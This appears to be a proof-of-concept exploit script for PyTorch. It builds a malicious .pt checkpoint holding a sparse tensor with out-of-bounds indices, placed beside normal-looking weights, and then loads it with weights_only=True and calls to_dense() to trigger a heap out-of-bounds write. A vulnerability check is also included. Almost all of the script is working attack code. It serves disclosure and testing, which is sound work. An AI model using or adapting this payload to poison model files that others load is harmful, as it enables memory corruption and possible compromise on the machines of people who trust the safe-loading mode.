File size: 7,263 Bytes
238fd51
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
#!/usr/bin/env python3
"""
PoC: Sparse Tensor OOB Memory Corruption via torch.load(weights_only=True)

This PoC demonstrates that a crafted .pt file containing a sparse tensor
with out-of-bounds indices can be loaded with weights_only=True (the default
safe mode) and cause heap memory corruption when the tensor is used.

The root cause is that _validate_loaded_sparse_tensors() skips validation
when check_sparse_tensor_invariants is disabled (the default since PyTorch 2.8.0).

IMPACT: Heap OOB write when .to_dense() is called on the loaded sparse tensor.
AFFECTED: PyTorch >= 2.8.0 with weights_only=True (default since 2.6.0)

Usage:
    python poc_sparse_oob.py --create   # Creates malicious_model.pt
    python poc_sparse_oob.py --load     # Loads and triggers the bug
    python poc_sparse_oob.py --check    # Checks if current PyTorch is vulnerable
"""

import argparse
import sys
import os


def check_vulnerability():
    """Check if the current PyTorch installation is vulnerable."""
    try:
        import torch
    except ImportError:
        print("[!] PyTorch is not installed. Install it to test.")
        return False

    print(f"[*] PyTorch version: {torch.__version__}")

    # Check 1: Is check_sparse_tensor_invariants disabled?
    invariants_enabled = torch.sparse.check_sparse_tensor_invariants.is_enabled()
    print(f"[*] Sparse tensor invariant checks enabled: {invariants_enabled}")

    if invariants_enabled:
        print("[*] NOT VULNERABLE: Sparse tensor invariant checks are enabled.")
        print("    This means _validate_loaded_sparse_tensors() will catch OOB indices.")
        return False

    # Check 2: Is _rebuild_sparse_tensor in the weights_only allowlist?
    from torch._weights_only_unpickler import _get_allowed_globals
    allowed = _get_allowed_globals()
    rebuild_sparse_key = "torch._utils._rebuild_sparse_tensor"
    if rebuild_sparse_key in allowed:
        print(f"[*] _rebuild_sparse_tensor IS in the weights_only allowlist")
    else:
        print(f"[*] _rebuild_sparse_tensor is NOT in the weights_only allowlist")
        print("    NOT VULNERABLE via this vector.")
        return False

    # Check 3: Verify _validate_loaded_sparse_tensors skips validation
    from torch._utils import _sparse_tensors_to_validate, _validate_loaded_sparse_tensors
    # Add a dummy entry
    dummy = torch.sparse_coo_tensor(
        torch.tensor([[0]]),
        torch.tensor([1.0]),
        (10,),
        check_invariants=False
    )
    _sparse_tensors_to_validate.append(dummy)
    _validate_loaded_sparse_tensors()
    # If the list was cleared without validation, we're vulnerable
    if len(_sparse_tensors_to_validate) == 0:
        print("[*] _validate_loaded_sparse_tensors() SKIPPED validation (list cleared)")
        print("[!] VULNERABLE: Sparse tensors loaded from files are NOT validated!")
        return True
    else:
        print("[*] _validate_loaded_sparse_tensors() performed validation")
        return False


def create_malicious_model(output_path="malicious_model.pt"):
    """Create a .pt file containing a sparse tensor with OOB indices."""
    import torch

    print(f"[*] Creating malicious model file: {output_path}")

    # Create a sparse COO tensor with indices that point far outside bounds
    # The tensor claims to be size (10,) but has an index at position 999999
    # When converted to dense, PyTorch will try to write to index 999999
    # in a buffer of size 10, causing heap OOB write.

    # Approach 1: Simple 1D case
    oob_indices = torch.tensor([[0, 7, 999999]])  # index 999999 is OOB for size 10
    values = torch.tensor([1.0, 2.0, 3.0])
    size = torch.Size([10])

    # Create without validation
    with torch.sparse.check_sparse_tensor_invariants(False):
        malicious_sparse = torch.sparse_coo_tensor(
            oob_indices, values, size, check_invariants=False
        )

    # Save as a state dict (standard model checkpoint format)
    state_dict = {
        "weight": torch.randn(10, 10),  # Normal tensor (looks legit)
        "bias": torch.randn(10),         # Normal tensor
        "sparse_layer": malicious_sparse, # Malicious sparse tensor
    }

    torch.save(state_dict, output_path)
    print(f"[+] Malicious model saved to {output_path}")
    print(f"    File size: {os.path.getsize(output_path)} bytes")
    print(f"[*] The 'sparse_layer' key contains a sparse tensor with OOB indices")
    print(f"    Declared size: {size}")
    print(f"    Max index in indices: {oob_indices.max().item()}")
    return output_path


def load_and_trigger(model_path="malicious_model.pt"):
    """Load the malicious model and trigger the OOB memory access."""
    import torch

    print(f"[*] Loading model from: {model_path}")
    print(f"[*] Using weights_only=True (the default safe mode)")

    # This should succeed -- weights_only=True allows sparse tensors
    state_dict = torch.load(model_path, weights_only=True)

    print(f"[+] Model loaded successfully with weights_only=True")
    print(f"[*] Keys in state_dict: {list(state_dict.keys())}")

    sparse_tensor = state_dict["sparse_layer"]
    print(f"[*] Sparse tensor loaded:")
    print(f"    Layout: {sparse_tensor.layout}")
    print(f"    Size: {sparse_tensor.size()}")
    print(f"    Indices shape: {sparse_tensor._indices().shape}")
    print(f"    Max index: {sparse_tensor._indices().max().item()}")
    print(f"    Invariant checks enabled: {torch.sparse.check_sparse_tensor_invariants.is_enabled()}")

    print()
    print("[!] About to call .to_dense() -- this will trigger OOB memory write!")
    print("[!] The tensor has index 999999 but size is only 10")
    print("[!] This writes to memory offset 999999 * sizeof(float) = ~4MB past buffer end")
    print()

    # WARNING: This will likely crash or corrupt memory
    input("Press Enter to trigger the OOB write (or Ctrl+C to abort)... ")

    try:
        dense = sparse_tensor.to_dense()
        print(f"[!] to_dense() completed (memory may be corrupted)")
        print(f"    Dense shape: {dense.shape}")
        print(f"    Dense values: {dense}")
    except Exception as e:
        print(f"[!] Exception during to_dense(): {type(e).__name__}: {e}")


def main():
    parser = argparse.ArgumentParser(
        description="PoC: Sparse Tensor OOB via torch.load(weights_only=True)"
    )
    parser.add_argument("--create", action="store_true",
                       help="Create the malicious model file")
    parser.add_argument("--load", action="store_true",
                       help="Load the malicious model and trigger the bug")
    parser.add_argument("--check", action="store_true",
                       help="Check if the current PyTorch is vulnerable")
    parser.add_argument("--output", default="malicious_model.pt",
                       help="Output path for the malicious model file")
    args = parser.parse_args()

    if not any([args.create, args.load, args.check]):
        parser.print_help()
        return

    if args.check:
        vulnerable = check_vulnerability()
        sys.exit(0 if vulnerable else 1)

    if args.create:
        create_malicious_model(args.output)

    if args.load:
        load_and_trigger(args.output)


if __name__ == "__main__":
    main()